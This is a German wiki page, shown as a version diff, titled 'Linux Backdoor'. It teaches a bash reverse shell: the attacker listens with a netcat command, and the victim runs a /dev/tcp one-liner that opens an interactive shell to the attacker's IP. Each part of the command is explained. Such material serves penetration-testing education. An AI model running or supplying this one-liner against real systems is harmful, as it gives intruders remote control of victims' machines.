Linux Backdoor: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 10: Zeile 10:
 
leitet die Standardausgabe und den Fehler auf den Socket um, der für die IP 10.0.10.101 geöffnet ist, die auf Port 8686 lauschen würde
 
leitet die Standardausgabe und den Fehler auf den Socket um, der für die IP 10.0.10.101 geöffnet ist, die auf Port 8686 lauschen würde
 
=0>&1=  
 
=0>&1=  
Ich lese es gerne als 0<&1. Dies würde buchstäblich bedeuten, dass "0" an "1" angehängt ist, was bedeutet, dass stdin an stdout angehängt ist, und aus Punkt 2 wissen wir, dass die stdin für diesen Bash-Prozess für den Angreifer verfügbar ist, der Port 8686 abhört.
+
Man kann es auch 0<&1 schreiben. Dies würde buchstäblich bedeuten, dass "0" an "1" angehängt ist, was bedeutet, dass stdin an stdout angehängt ist, und aus Punkt 2 wissen wir, dass die stdin für diesen Bash-Prozess für den Angreifer verfügbar ist, der Port 8686 abhört.
 +
 
 
=Links=
 
=Links=
 
*http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
 
*http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Version vom 13. März 2023, 19:00 Uhr

Angreifer

IP Angreifer 10.0.10.101

  • netcat -lp 8686

Opfer

  • bash -i >& /dev/tcp/10.0.10.101/8686 0>&1

bash -i

öffnet eine interaktive Shell

&>

leitet die Standardausgabe und den Fehler auf den Socket um, der für die IP 10.0.10.101 geöffnet ist, die auf Port 8686 lauschen würde

0>&1

Man kann es auch 0<&1 schreiben. Dies würde buchstäblich bedeuten, dass "0" an "1" angehängt ist, was bedeutet, dass stdin an stdout angehängt ist, und aus Punkt 2 wissen wir, dass die stdin für diesen Bash-Prozess für den Angreifer verfügbar ist, der Port 8686 abhört.

Links